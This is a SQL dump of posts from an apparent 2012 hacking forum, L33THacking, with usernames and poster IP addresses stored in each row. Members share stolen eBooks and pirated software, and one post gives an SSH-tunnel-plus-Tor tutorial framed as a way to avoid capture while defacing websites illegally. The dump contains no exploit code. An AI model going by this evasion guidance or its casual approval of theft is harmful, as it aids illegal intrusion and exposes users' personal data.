`replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1979', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347664425', 'Size: Dunno Colour Scheme: Black, Red, Grey, Silver or white Render/Image: http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png Text: Admin Anything else: This is going to be the admin userbar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '743e6a517176d83401e3365d1db71163', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1980', '433', '1977', '61', 'RE: eBooks Giveaway', '0', '82', 'iTzIpod', '1347664544', '[quote=\'t3h jok3r\' pid=\'1977\' dateline=\'1347664320\'] Why not take a screenshot of some of them? [/quote] I don\'t own them.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '268f3cab1b21a25feb51f2a6e6d5bac1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1981', '434', '0', '61', 'Money Making eBook', '0', '82', 'iTzIpod', '1347664759', 'This eBook was stolen using the UploadNSell Method. Download: http://www.mediafire.com/?9didxjc47kebh58 View: http://www.mediafire.com/view/?9didxjc47kebh58', '24.212.197.164', '416597412', '1', '0', '82', '1347664787', '1', '89c63804e5930f4e401e71f40fd1e1b4', '0', '1347664787'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1982', '432', '1968', '61', 'RE: 145+ eBooks Giveaway', '0', '82', 'iTzIpod', '1347664886', 'Alright. Thanks for the heads up. Done.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '46f10d20e1e5ac5e8c48ecd77d765f47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1983', '345', '1976', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347665593', 'I don\'t know it\'s just the colors/ the font. I\'m not a fan of really dark things.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c64f4296ab9d64ab713b46b002fe0cb0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1984', '435', '0', '4', 'Newbie Here', '0', '188', 'Lonnie', '1347666181', 'Well hello there. I am Lonnie. A friend of iTzIpod. Hello to you all.', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '855672678efad30a28bb8e0ac26f46a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1985', '435', '1984', '4', 'RE: Newbie Here', '0', '82', 'iTzIpod', '1347666265', 'Hey Lonnie, sup? Thanks for registering under my referral! <3 After asking like 80 friends, someone actually registered. Thanks <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c4827d1fdd86cef981eff79f83d19938', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1986', '435', '1985', '4', 'RE: Newbie Here', '0', '188', 'Lonnie', '1347666597', '[quote=\'iTzIpod\' pid=\'1985\' dateline=\'1347666265\'] Hey Lonnie, sup? Thanks for registering under my referral! <3 After asking like 80 friends, someone actually registered. Thanks <3 [/quote] That\'s cause I am a good friend. ;D', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '3364d101ad3b1d6d333d4f21e79839bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1987', '331', '1545', '5', 'RE: New Rules and Instructions v.4', '0', '1', 't3h jok3r', '1347666828', 'Updated. Added junk tool moderation action requirement and administrative notes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8e8cbc9e9cae0927a8bf1799f4e3d19d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1988', '436', '0', '7', 'Motivation', '0', '82', 'iTzIpod', '1347671765', 'Wow.. I noticed that we lost a lot of active members ever since School started. :/ Lets all try to stay active and post daily to maintain our activity. This way, we are all growing at a strong and easy pace. - Unique\'s Leader iTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1347671797', '1', '71a4941078be31ab4062a20120e53e0b', '0', '1347671797'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1989', '368', '1800', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '1', 't3h jok3r', '1347675176', '[quote=\'NXK\' pid=\'1800\' dateline=\'1347375623\'] Id like one, make me look alittle more legit. I have more than 3 threads that are HQ. [/quote] How the fuck did I miss you out? My bad anyway you have to make 3 HQ threads after you check in.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cffb302a6b4151b0b95bc6e297fd2967', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1990', '38', '1856', '16', 'RE: [tut] How to lie like a pro', '0', '1', 't3h jok3r', '1347675210', '[quote=\'iTzIpod\' pid=\'1856\' dateline=\'1347493805\'] Cool tutorial :3 I\'m not a good liar.. :/ [/quote] I use to be a good liar, I could look into eyes and lie.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '97abdd41e8ccd96838dc13e70671fa60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1991', '363', '1706', '8', 'RE: Top 10 songs of September 2012', '0', '1', 't3h jok3r', '1347675255', 'Heard that song once before.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '47609fa223b200640c29576ac6f9289f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1992', '363', '1706', '8', 'RE: Top 10 songs of September 2012', '0', '82', 'iTzIpod', '1347675399', 'I didn\'t like that song. I actually like this song :p Kevin Rudolf - Champions More than that one @NXK.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'adfb9eff8e97e1e98fcc4e98b0b2b222', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1993', '435', '1984', '4', 'RE: Newbie Here', '0', '1', 't3h jok3r', '1347675409', 'Welcome to L33THacking Lonnie, feel free to contact me if you have any questions or reports.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd846424cd23688f0f7f0dda6ca37cd8d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1994', '38', '1990', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347675467', '[quote=\'t3h jok3r\' pid=\'1990\' dateline=\'1347675210\'] [quote=\'iTzIpod\' pid=\'1856\' dateline=\'1347493805\'] Cool tutorial :3 I\'m not a good liar.. :/ [/quote] I use to be a good liar, I could look into eyes and lie. [/quote] LOL I can\'t even master that..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8e38839dcd0e742a2d16b4cd1b18a1c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1995', '437', '0', '3', 'Help keep LH up', '0', '1', 't3h jok3r', '1347676177', 'LH obviously needs to money to stay up. Since LH is forever ADs free website, I will post some adf.ly links below so LH could earn something. Donations are most welcome. L33THACKING: http://adf.ly/AeOpy Hotspotshield: http://adf.ly/3oGgX Fake inbox emailer: http://adf.ly/3oGes Craigslist: http://adf.ly/3oH9N Vulcan cookie cleaner: http://adf.ly/5HprD CCleaner: http://adf.ly/7gyux Malwarebytes: http://adf.ly/7gyt7 If you click any link above then please post below. [b]Why post below?[/b] 1. It will increase forum activity, especially your post count 2. This thread will get bumped. [b]Jok3r can\'t afford to run LH?[/b] I can afford to run LH, but the thing is that I buy advertisements on different sites everyday which costs a lot then hosting, protection, domain, plugins, graphics etc is another cost. So far within 3 months (1st month was maintenance month) I have spent over $150 bucks and earned 0 cents. I was planning to take down LH few days ago but I don\'t quit to quickly. Please tell your friends and if possible buy stickies, donations are welcome and if you have more than 10 posts you will get a 50% discount in forum upgrades. LH is hosted on two different hostings so hosts itself cost a lot.', '72.231.24.165', '1223104677', '1', '0', '1', '1347676597', '1', '76ce196f547f97e7e991e4e9c28cafd0', '0', '1347676597'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1996', '378', '1742', '7', 'RE: How is school for you?', '0', '1', 't3h jok3r', '1347676666', 'Luckily all my new teachers are awesome but my new schools building is kinda small, can\'t believe it\'s a popular school.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3a5e543ad753deecd5935c32c7e7f205', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1997', '412', '1919', '7', 'RE: 400th Thread', '0', '1', 't3h jok3r', '1347676741', '[quote=\'iTzIpod\' pid=\'1919\' dateline=\'1347628172\'] [quote=\'t3h jok3r\' pid=\'1906\' dateline=\'1347593867\'] Congratz on the 400 threads LH and 400 posts iTzIpod, the more activity we have the more backlinks we will have which means more HQ members. [/quote] Thanks! :D @Apathy, Gratz on 100 posts :3 [/quote] You made me lol. We are talking about reaching a huge milestone which is 400 threads and you congratulated Apathy for 100 posts. Nothing against anyone, just saying it\'s funny.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8ca168824da5efc55d4641276b5f7b9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1998', '436', '1988', '7', 'RE: Motivation', '0', '1', 't3h jok3r', '1347676779', 'I think it\'s because we getting known AND schools have started so people are getting off from holidays and now staying more at home.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd9988acf9eace493a6c59f4f97e4b002', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2037', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347684352', 'I put it everything and selected metropcs. I said 10 SMS but none send to my phone.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5430a5a287bb9ef4c60962f6a9179cbf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2000', '417', '1911', '4', 'RE: HI!', '0', '9', 'p420', '1347676924', 'Welcome to L33THacking homeless, You have come to the right place. Hope you like L33THacking and enjoy.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '21604f32dfe1156d1af96220777a7c59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2001', '435', '1984', '4', 'RE: Newbie Here', '0', '9', 'p420', '1347676989', 'Welcome to L33THacking Lonnie. Hope you enjoy your stay.', '72.231.24.165', '1223104677', '0', '0', '9', '1347681176', '1', 'b86b06dbda6f35857d32204f79f3564a', '0', '1347681176'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2002', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '188', 'Lonnie', '1347677014', 'Thanks for sharing! I must try downloading this Sunday', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '4726478ac00fd8650a6b05e693914c72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2003', '422', '1936', '19', 'RE: [Read] Announcement', '0', '9', 'p420', '1347677213', 'You made a lot of contributions in this group, by the way this is an invite only group right?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'b11849e11da6bc3168544737536f2810', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2004', '425', '1939', '61', 'RE: Huge SEing Giveaway [50+]', '0', '9', 'p420', '1347677265', 'Please provide a Virus Scan. Also any screenshots to show you have the ebooks? I just want to be on the safe side.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '42506261afb219eedbd5f98aaa8433a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2005', '424', '1938', '61', 'RE: Money Making eBooks', '0', '9', 'p420', '1347677315', 'Please provide a Virus Scan. Also any screenshots to show you have the ebooks?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '10f7dd3d19454321ee77605f8b1d470b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2006', '427', '1941', '61', 'RE: Photoshop CS6 Extended 64 Bit', '0', '9', 'p420', '1347677346', 'I already have PS but thanks anyway.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2d57d1f094390a2545d89bacd38ec704', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2007', '434', '1981', '61', 'RE: Money Making eBook', '0', '9', 'p420', '1347677381', 'Cross posting or you created a different thread? http://l33thacking.net/thread-424.html', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4ecb22821d8e139b3b78311ae633b334', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2008', '433', '1980', '61', 'RE: eBooks Giveaway', '0', '9', 'p420', '1347677433', '[quote=\'iTzIpod\' pid=\'1980\' dateline=\'1347664544\'] [quote=\'t3h jok3r\' pid=\'1977\' dateline=\'1347664320\'] Why not take a screenshot of some of them? [/quote] I don\'t own them. [/quote] I\'m sure Jok3r meant to take a screenshot of your giveaway folder.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '82f3fca8bfe26d32d76c9579e28898b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2009', '432', '1968', '61', 'RE: 145+ eBooks Giveaway', '0', '9', 'p420', '1347677470', 'Are they all autopilot? Thanks for the ebooks.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '62e194543f171fd4d3a3c1f7a5f134a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2010', '437', '1995', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347677722', 'Clicking on all links. Right now. I suggest you a Website Viewer on Adf.ly links. Not sure if it works but it should? Also, the first link leads to L33thacking.com even though we switched domains to L33thacking.net', '24.212.197.164', '416597412', '1', '0', '82', '1347677786', '1', 'eff4d5f215e27b38f7fdec55b155c666', '0', '1347677786'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2011', '353', '1654', '13', 'RE: [Complete Guide]*How to crack All Sites Hosting With Apex!*[Complete Guide]', '0', '9', 'p420', '1347677746', 'This is nice unique tutorial.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '10ae5b598bc02bb1bc4110c67291d015', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2012', '438', '0', '13', 'Stay Anonymous (Secure) online 2012 Using SSH Tunneling', '0', '9', 'p420', '1347677781', 'Hi all users, I know most of you are scare before hacking/defacing a website without taking precautions. Because most of you may not be having a good VPN which is paid and secure enough to do illegal stuffs and if you user free VPN you\'ll easily get caught. So today we will teach you how to stay completely secure (anonymous) without using any VPN. So lets get started. Here is some drawbacks using free VPN : They are slow and contain ads in most of the cases. The provide limited number of proxies. They are insecure as they store logs. Logs are easily Traceable. They are not reliable because even when they say they do not store logs,they do it Tool that we\'ll use is this TUT : TOR Browser Download [url=https://www.torproject.org/download/download]Here[/url] PuTTY Download [url=http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe]Here[/url] Now open PuTTY and in the category, choose Session and fill the boxes as mentioned below : Host Name : shellmix.com Port : 30 Connection Type : SSH [img]http://2.bp.blogspot.com/-W8WUZ3lRpxw/UEDWt8HT_qI/AAAAAAAAFG4/QfpEQA0qCfE/s1600/Stay-Anonymous-And-Secure-by-SSH-Tunneling-+-TOR-(NOOB-Friendly)-1.gif[/img] And Click Open, a black window will appear.Enter the Username and password as \"newuser\" (Password appears blank but its typed). 1. Now enter a Login name and a password. 2. Enter another password For MySQL Database. 3. Enter Email Address. 4. Choose Editor and Enter pico. Language : us Vhost : shell HDD : Enter hdd1 or hdd2 Now press Enter to Continue.Now your shell account is ready, make sure you remember the username and that password you created. SSH TUNNELING Now we\'re going to do SSH tunneling, reopen the PuTTY and follow the steps below to make it work : Host : shellmix.com. Port : 22. Now in category on the left,choose SSH. Expand it and select Tunnel. Destination : Dynamic. Port : Any random port. (Example : 4545) Click Add and finally click on Open. Enter the Login name and Password that you created earlier and leave this window open. [img]http://3.bp.blogspot.com/-CER7EKcO7Vw/UEDfHYuWoyI/AAAAAAAAFHw/Uh2GKHpWq7o/s1600/Stay+Anonymous+And+Secure+by+SSH+Tunneling+%252B+TOR+%2528NOOB+Friendly%2529+2.gif[/img] Now open TOR 1. Click Firefox > Options > Advanced > Network > Settings 2. Click Manual Proxy Configuration Socks Host : 127.0.0.1 Port : 4545 (The port you used earlier in PuTTY) 3. Click on OK. SSH Tunnel Is Ready. Go to [url]http://www.ip2location.com/[/url] and verify your fake IP Stay Anonymous', '72.231.24.165', '1223104677', '0', '0', '1', '1347677816', '1', '78010452e84957e3a7e427c09236e9bb', '0', '1347677816'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2013', '412', '1997', '7', 'RE: 400th Thread', '0', '82', 'iTzIpod', '1347677907', '[quote=\'t3h jok3r\' pid=\'1997\' dateline=\'1347676741\'] [quote=\'iTzIpod\' pid=\'1919\' dateline=\'1347628172\'] [quote=\'t3h jok3r\' pid=\'1906\' dateline=\'1347593867\'] Congratz on the 400 threads LH and 400 posts iTzIpod, the more activity we have the more backlinks we will have which means more HQ members. [/quote] Thanks! :D @Apathy, Gratz on 100 posts :3 [/quote] You made me lol. We are talking about reaching a huge milestone which is 400 threads and you congratulated Apathy for 100 posts. Nothing against anyone, just saying it\'s funny. [/quote] NXK is at 99 posts at the moment :3 -Waits-', '24.212.197.164', '416597412', '1', '0', '82', '1347677924', '1', 'cf991d707df42b4ea5074520a0de673e', '0', '1347677924'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2014', '378', '1996', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347677963', '[quote=\'t3h jok3r\' pid=\'1996\' dateline=\'1347676666\'] Luckily all my new teachers are awesome but my new schools building is kinda small, can\'t believe it\'s a popular school. [/quote] Was it rebuilt?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5c8ac40a79712cea193012952151c954', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2015', '422', '2003', '19', 'RE: [Read] Announcement', '0', '82', 'iTzIpod', '1347678073', '[quote=\'p420\' pid=\'2003\' dateline=\'1347677213\'] You made a lot of contributions in this group, by the way this is an invite only group right? [/quote] Invite Only/Join Only. If you request to join, I will decide either Yes or No to accept your request.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0faf308d49226250829ec16a46575e47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2016', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1347678132', '@Lonnie, no problem. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2dc92d9d43ea7768b684cb1444044124', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2017', '424', '1938', '61', 'RE: Money Making eBooks', '0', '82', 'iTzIpod', '1347678166', 'Will post screenshots and virus scans soon. Hopefully tomorrow.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '595499a5a31eb1ac46f627575b16306a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2018', '432', '2009', '61', 'RE: 145+ eBooks Giveaway', '0', '82', 'iTzIpod', '1347678235', '[quote=\'p420\' pid=\'2009\' dateline=\'1347677470\'] Are they all autopilot? Thanks for the ebooks. [/quote] No. They have a few eBooks that are autopilot and some are manual. No Problem.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9faa732d58e0f7b34cb37ee95f0e3f5e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2019', '437', '1995', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347678869', 'Website Viewer? And fixed the link to L33THacking.net', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '07296c6ef8fe9c14f5d8974590217336', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2020', '437', '2019', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347679116', '[quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\'] Website Viewer? And fixed the link to L33THacking.net [/quote] As long as it\'s an adf.ly link and someone clicks on it, you still get money. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd94e511192c17f78dd08000b0409bf2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2021', '430', '1951', '9', 'RE: ? ?[7.99]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '1', 't3h jok3r', '1347679539', '[font=Tahoma][align=center][size=x-large][b][color=#32CD32]Ebook review by Jok3r[/color][/b][/size][/align][/font] [font=Tahoma][size=large][b][color=#32CD32]Quality of Information (3/5)[/color][/b][/size][/font] Well-explained ebook. This ebook contains two different monetizing techniques, in fact we even have a sub-forum for one of the technique. His 